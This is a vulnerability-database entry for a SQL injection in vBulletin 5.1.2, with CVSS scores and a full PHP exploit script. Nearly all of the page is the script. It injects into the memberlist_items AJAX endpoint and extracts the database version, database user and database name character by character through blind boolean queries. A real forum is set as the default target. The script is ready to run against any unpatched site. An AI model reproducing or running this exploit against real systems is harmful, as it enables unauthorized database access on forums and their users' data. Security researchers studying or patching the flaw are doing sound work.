vBulletin 5.1.2 SQL Injection Exploit

2014-07-22 / 2014-08-24
Credit: Nytro
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* Author: Nytro Powered by: Romanian Security Team Price: Free. Educational. */ error_reporting(E_ALL); ini_set('display_errors', 1); // Get arguments $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5'; $expression = str_replace('/', '\\/', $target_url); // Function to send a POST request function httpPost($url,$params) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Accept: application/json, text/javascript, */*; q=0.01', 'X-Requested-With: XMLHttpRequest', 'Referer: https://rstforums.com/v5/memberlist', 'Accept-Language: en-US,en;q=0.5', 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' )); $output = curl_exec($ch); if($output == FALSE) print htmlspecialchars(curl_error($ch)); curl_close($ch); return $output; } // Function to get string between two other strings function get_string_between($string, $start, $end) { $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } // Get version print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n"; print "Version: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get user print "\r\nUser: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } // Get database print "\r\nDatabse: "; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); $letter = 1; while(strpos($result, 'No Users Matched Your Query') == false) { $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result); $username = get_string_between($exploded[1], '">', '<\/a>'); print $username[0]; $letter++; $result = httpPost($target_url . '/ajax/render/memberlist_items', 'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' . '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest'); } print "\r\n" ?>

References:

http://cxsecurity.com/issue/WLB-2014070101


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top